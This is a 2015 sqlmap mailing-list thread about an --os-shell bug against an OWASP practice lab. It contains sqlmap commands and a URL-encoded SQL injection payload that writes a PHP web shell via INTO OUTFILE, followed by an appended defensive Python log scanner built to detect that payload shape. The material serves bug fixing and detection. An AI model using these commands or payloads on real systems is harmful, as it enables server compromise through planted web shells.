Re: [sqlmap-users] SQLmap --os-shell BUG
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:47:48
Thank you for your report. Fixed with the latest revision (https://github.com/sqlmapproject/sqlmap/issues/1290)

Bye

On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:

> With yours is not throwing the error, you can reproduce my case with the
> owasppractice examples, I am attaching the source code here, you will need
> to setup the DB. Once up and running try lesson03:
>
> sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shell --prefix "\")" -v3
>
> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
> payloads specific for other DBMSes? [Y/n]
> Y
> for the remaining tests, do you want to include all tests for 'MySQL'
> extending provided level (1) and risk (1) values? [Y/n]
> n
>
> And should get the same error handling issue.
>
> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Something is really wrong happening here. One user is having the
>> identical problem like you (AttributeError: 'NoneType' object has no
>> attribute 'replace') and I am not able to reproduce.
>>
>> Can you please rerun your sqlmap version with
>> "http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>> the same error?
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>
>>> Just clone git and got 1.0-dev-166dc98 version but got an unhandled
>>> exception error:
>>>
>>> ./sqlmap.py -u
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>> --os-shell --prefix "\")" --flush-session -v3
>>>
>>> /sqlmap'. If the exception persists, please open a new issue at
>>> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any other information required to reproduce the bug. The
>>> developers will try to reproduce the bug, fix it accordingly and get back
>>> to you
>>> sqlmap version: 1.0-dev-166dc98
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -u
>>> *********************************************************************
>>> --os-shell --prefix ") --flush-session -v3
>>> Technique: None
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>>   File "sqlmap.py", line 102, in main
>>>     start()
>>>   File "lib/controller/controller.py", line 514, in start
>>>     injection = checkSqlInjection(place, parameter, value)
>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>> where=where)
>>>   File "lib/core/agent.py", line 188, in payload
>>>     retVal = _(regex, "%s=%s" % (parameter,
>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>
>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> I believe that you are using an old revision. For a long time there is
>>>> at least a git revision or a pseudo "non-git" number appearing when
>>>> "sqlmap --version" is being used.
>>>>
>>>> Please update to the latest revision from the official github
>>>> repository and rerun the sqlmap.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Thanks
>>>>>
>>>>> sqlmap --version
>>>>> sqlmap/1.0-dev
>>>>>
>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>
>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>>> Which revision/version of sqlmap do you use? There has been a related
>>>>>> patch a month ago. Will check tomorrow.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>
>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>
>>>>>>> Description:
>>>>>>>
>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>> therefore not able to upload the web shell.
>>>>>>>
>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%[...]--+
>>>>>>>
>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>
>>>>>>> mysql> select 'ss' into outfile
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>> ERROR 1086 (HY000): File
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>
>>>>>>> Solution:
>>>>>>>
>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>>> when using the --os-shell option
>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>
>>>>>>> --
>>>>>>> DanUx
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>
>>>>> --
>>>>> DanUx
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm
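
Added example, not part of the original thread and not sqlmap's code: a defender-side check that flags the `INTO OUTFILE` request shape reported above when it shows up in web access logs. The log lines, the 192.0.2.x addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the thread); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.7 - - [04/Jul/2015:22:30:00 +0000] "GET /search.php?q=move+into+outfile+mode HTTP/1.1" 200 812',
    '192.0.2.9 - - [04/Jul/2015:22:33:10 +0000] "GET /injection/lessons/lesson03/index.php'
    '?code=X%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27--+'
    ' HTTP/1.1" 200 97',
    '192.0.2.9 - - [04/Jul/2015:22:34:02 +0000] "GET /item.php'
    '?id=1%2520INTO%2520DUMPFILE%2520%2527/tmp/x.bin%2527 HTTP/1.1" 500 0',
]

# "METHOD target HTTP/x.y" field of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')
# INTO OUTFILE/DUMPFILE followed by a quoted path; the quote requirement keeps
# ordinary search text such as "into outfile mode" from matching.
OUTFILE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.I)
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

def decode_fully(value, max_rounds=3):
    """URL-decode a bounded number of times so double-encoded payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_outfile_writes(log_lines):
    """Return one record per request whose query string asks MySQL to write a file."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        target = urlsplit(req.group(1))
        match = OUTFILE_RE.search(decode_fully(target.query))
        if match:
            hits.append({
                "line": lineno,
                "endpoint": target.path,
                "keyword": match.group(1).upper(),
                "target_file": match.group(2),
                # A server-executable extension means the write is a likely web shell drop.
                "script_ext": match.group(2).lower().endswith(SCRIPT_EXTS),
            })
    return hits

if __name__ == "__main__":
    for hit in find_outfile_writes(SAMPLE_LOG):
        print(hit)
```

A hit whose `target_file` sits under the web root with `script_ext` set is worth correlating with zero-byte or newly created files in that directory, which is the leftover state the report describes.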